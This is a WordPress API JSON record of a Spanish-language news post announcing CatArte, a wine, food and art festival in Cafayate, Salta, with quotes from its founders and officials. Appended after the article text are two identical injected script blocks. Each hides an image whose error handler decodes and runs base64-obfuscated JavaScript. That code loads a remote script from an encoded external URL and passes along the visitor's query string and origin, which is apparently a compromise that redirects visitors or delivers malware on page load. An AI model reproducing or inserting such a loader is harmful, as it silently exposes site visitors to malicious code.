{"id":4528,"date":"2024-10-28T09:26:23","date_gmt":"2024-10-28T12:26:23","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=4528"},"modified":"2025-08-13T23:46:41","modified_gmt":"2025-08-14T02:46:41","slug":"catarte-se-presento-en-buenos-aires-y-anuncia-su-primera-edicion-en-cafayate","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=4528","title":{"rendered":"CatArte se present\u00f3 en Buenos Aires y anuncia su primera edici\u00f3n en Cafayate"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-text-color has-link-color wp-elements-7272649958236c123a99395a03196087\" style=\"color:#910251\"><strong><em>El Festival de Vinos tendr\u00e1 su primera edici\u00f3n el 11 y 12 de abril de 2025 en Cafayate. Con una propuesta que integra enolog\u00eda, gastronom\u00eda y arte, el evento busca consolidarse como una de las experiencias enotur\u00edsticas m\u00e1s destacadas del pa\u00eds.<\/em><\/strong><\/h4>\n\n\n\n<p>En Casa de Salta, Ciudad Aut\u00f3noma de Buenos Aires, se llev\u00f3 a cabo la presentaci\u00f3n de CatArte, el Festival de Vinos que promete consolidarse como un referente de enoturismo en los Valles Calchaqu\u00edes. La primera edici\u00f3n de CatArte tendr\u00e1 lugar los d\u00edas 11 y 12 de abril de 2025 en la finca El Retiro, de la reconocida bodega El Porvenir. Participaron del lanzamiento&nbsp;<strong>Mart\u00edn Plaza<\/strong>, delegado de Casa de Salta, y&nbsp;<strong>Mercedes Ortiz<\/strong>, directora de Grandes Eventos de Salta.<\/p>\n\n\n\n<p>CatArte, fundado por<strong>&nbsp;Bel\u00e9n Carril Loyte<\/strong>&nbsp;y&nbsp;<strong>Julia Rebottaro<\/strong>, es un evento que conjuga la enolog\u00eda, la gastronom\u00eda y la cultura en el incomparable escenario de la Ruta del Vino de Altura. Durante dos d\u00edas, los asistentes podr\u00e1n vivir una experiencia multisensorial en la que los vinos salte\u00f1os ser\u00e1n los protagonistas, acompa\u00f1ados de propuestas gastron\u00f3micas locales y una variada programaci\u00f3n art\u00edstica. El festival re\u00fane a m\u00e1s de 30 bodegas y presenta m\u00e1s de 100 etiquetas que ofrecer\u00e1n degustaci\u00f3n abierta, resaltando la riqueza y diversidad de los vinos de altura que posicionan a Cafayate como una regi\u00f3n vitivin\u00edcola de excelencia.<\/p>\n\n\n\n<p><strong>Una experiencia de sabores, m\u00fasica y arte<\/strong><\/p>\n\n\n\n<p>Adem\u00e1s de la degustaci\u00f3n de vinos, el evento contar\u00e1 con el Escenario CatArte, que ofrecer\u00e1 m\u00fasica en vivo a cargo de destacados artistas de la escena local y contar\u00e1 con&nbsp;<strong>Mart\u00edn Misa<\/strong>&nbsp;como programador musical. La propuesta se completa con ExpoCatArte, una exposici\u00f3n de arte contempor\u00e1neo curada por&nbsp;<strong>Marcela L\u00f3pez Sastre<\/strong>, y una innovadora oferta gastron\u00f3mica dise\u00f1ada junto a Pausa, un equipo que se especializa en cocina regional para crear el maridaje perfecto.<\/p>\n\n\n\n<p><strong>CatArte, un impulso para el turismo enol\u00f3gico y cultural en Salta<\/strong><\/p>\n\n\n\n<p>Para Salta, este evento marca una oportunidad de crecimiento en el turismo de calidad, al sumar una fecha destacada al calendario enotur\u00edstico nacional.&nbsp;<strong>Julia Rebottaro<\/strong>, cofundadora de CatArte, indic\u00f3 sobre esto que \u201cnuestra propuesta es generar una nueva fecha tur\u00edstica para Cafayate y los Valles Calchaqu\u00edes, vinculada al vino y al estilo de vida que representa\u201d y agreg\u00f3 \u201ccreemos que el festival es un producto que viene a enaltecer la industria vitivin\u00edcola salte\u00f1a, acompa\u00f1ando el crecimiento y el desarrollo que las bodegas y los productores de vinos han ejecutado en los \u00faltimos 10 a\u00f1os\u201d.<\/p>\n\n\n\n<p>En esta l\u00ednea, Rebottaro destac\u00f3 que \u201cCatArte cuenta con el acompa\u00f1amiento del Gobierno de Salta que ya nos otorg\u00f3 la Declaraci\u00f3n de Inter\u00e9s Tur\u00edstico Provincial y sabemos que est\u00e1 pronta a salir la Declaraci\u00f3n de Inter\u00e9s Tur\u00edstico Nacional por parte de la Secretar\u00eda de Turismo de Naci\u00f3n\u201d.<\/p>\n\n\n\n<p>Por su parte, el ministro de Turismo y Deportes de Salta,&nbsp;<strong>Mario Pe\u00f1a,<\/strong>&nbsp;expres\u00f3 su entusiasmo por el evento manifestando que \u201cCatArte es una iniciativa que refleja el compromiso de Salta con la promoci\u00f3n de nuestros vinos y la identidad cultural de los Valles Calchaqu\u00edes. Este festival representa una oportunidad de posicionar a Cafayate no solo como un centro de producci\u00f3n vitivin\u00edcola de excelencia, sino tambi\u00e9n como un destino tur\u00edstico de primer nivel. Desde el Ministerio de Turismo, apoyamos este evento y confiamos en que contribuir\u00e1 significativamente al crecimiento del enoturismo en la regi\u00f3n.\u201d<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:&nbsp;<strong>Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>El Festival de Vinos tendr\u00e1 su primera edici\u00f3n el 11 y 12 de abril de 2025 en Cafayate. Con una propuesta que integra enolog\u00eda, gastronom\u00eda y arte, el evento busca consolidarse como una de las experiencias enotur\u00edsticas m\u00e1s destacadas del pa\u00eds. En Casa de Salta, Ciudad Aut\u00f3noma de Buenos Aires, se llev\u00f3 a cabo la [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":4529,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[24,18],"tags":[],"class_list":{"0":"post-4528","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-bodegas","8":"category-rutas-y-caminos"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4528"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4528"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4528\/revisions"}],"predecessor-version":[{"id":6654,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4528\/revisions\/6654"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/4529"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4528"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4528"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4528"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}